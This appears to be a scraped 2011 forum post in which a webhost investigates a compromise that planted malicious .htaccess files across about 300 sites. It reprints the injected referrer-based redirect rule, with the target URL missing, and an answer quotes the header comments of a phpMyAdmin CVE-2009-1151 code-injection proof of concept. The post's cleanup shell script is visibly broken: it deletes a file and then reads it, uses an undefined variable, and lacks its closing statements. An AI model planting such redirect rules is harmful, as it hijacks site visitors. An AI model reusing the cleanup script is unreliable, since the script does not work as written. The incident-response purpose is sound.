Aug 13, 2011

Finding Webserver Vulnerability


We operate a webserver farm hosting around 300 websites.

Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites.

The content of the .htaccess file was this:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteRule .{REMOTE_ADDR}

Googling for that url (which is the md5 hash of “antivirus”) I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is.

I have searched most of our logs, but haven’t found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole?

So far we have determined:

  • the changes were made as www-data, so apache or it’s plugins are likely the culprit
  • all the changes were made within 15 minutes of each other, so it was probably automated
  • since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site)
  • if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse)

Any more hints would be appreciated.


For those who need it, here is the script I used to clean up the .htaccess files:

TMP=/tmp/`mktemp "XXXXXX"`
find $DIR -name .htaccess|while read FILE; do
  if ( grep $PATT "$FILE" > /dev/null); then
    if [ `cat "$FILE"|wc -l` -eq 4 ]; then
      rm "$FILE"
      if ( tail -n1 "$FILE"|grep $PATT > /dev/null ); then
        rm $TMP
        cp "$FILE" $TMP
        LINES=`cat $TMP|wc -l`
        head -n $GOODLINES $TMP > "$FILE"
        echo $FILE requires manual intervention


There’s an exploit of phpMyAdmin


# CVE-2009-1151: phpMyAdmin ‘/scripts/setup.php’ PHP Code Injection RCE PoC v0.11
# by pagvac (, 4th June 2009.
# special thanks to Greg Ose ( for discovering such a cool vuln,
# and to str0ke ( for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4,,, 3.0.0 and
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before
# and 3.x before according to PMASA-2009-3
# 2) it seems this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the wizard method, rather than manual method:
# 3) administrator must have NOT deleted the ‘/config/’ directory
# within the ‘/phpMyAdmin/’ directory. this is because this directory is
# where ‘/scripts/setup.php’ tries to create ‘’ which is where
# our evil PHP code is injected 8)

# more info on:

Related posts:

  1. Add htaccess for phpMyAdmin installed in /usr/share/?
  2. phpMyAdmin File Could Not Be Read
  3. Webserver and PHP File Security
  4. adding dynamic subdomains to my webserver?
  5. JBOSS Vulnerability [PCI Scan]

Leave a comment